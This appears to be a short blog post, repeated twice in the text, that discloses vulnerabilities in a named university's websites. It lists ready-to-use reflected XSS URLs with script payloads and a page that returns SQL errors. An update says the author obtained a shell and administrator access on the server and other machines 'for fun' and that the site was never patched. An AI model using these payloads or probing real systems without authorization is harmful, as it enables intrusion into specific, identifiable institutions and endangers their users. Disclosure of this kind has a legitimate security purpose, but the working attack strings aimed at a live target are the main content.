There are several other bugs and It's always the same code.
A few samples.
http://www.unisannio.it/notizie/comunicati/viscom.php?id=%3Cscript%3Ealert%281%29;%3C/script%3E
http://www.unisannio.it/notizie/semconv/viscom.php?id=%3Cscript%3Ealert%281%29;%3C/script%3E
http://www.unisannio.it/notizie/seminari/viscom.php?id=
http://ing.unisannio.it/ects/scheda.php?1 - sql errors
-29/12/2011 Update-
After a 10 minutes spent on the website for fun I've tested that it's possible to run a shell without a lot of problems, the system can be compromised and it's possible to get full administration privileges. The same goes for a few other boxes in the network ... no one is going to patch those computer even after mailing them about the problem.
A few samples.
http://www.unisannio.it/notizie/comunicati/viscom.php?id=%3Cscript%3Ealert%281%29;%3C/script%3E
http://www.unisannio.it/notizie/semconv/viscom.php?id=%3Cscript%3Ealert%281%29;%3C/script%3E
http://www.unisannio.it/notizie/seminari/viscom.php?id=
http://ing.unisannio.it/ects/scheda.php?1 - sql errors
-29/12/2011 Update-
After a 10 minutes spent on the website for fun I've tested that it's possible to run a shell without a lot of problems, the system can be compromised and it's possible to get full administration privileges. The same goes for a few other boxes in the network ... no one is going to patch those computer even after mailing them about the problem.
Comments
Post a Comment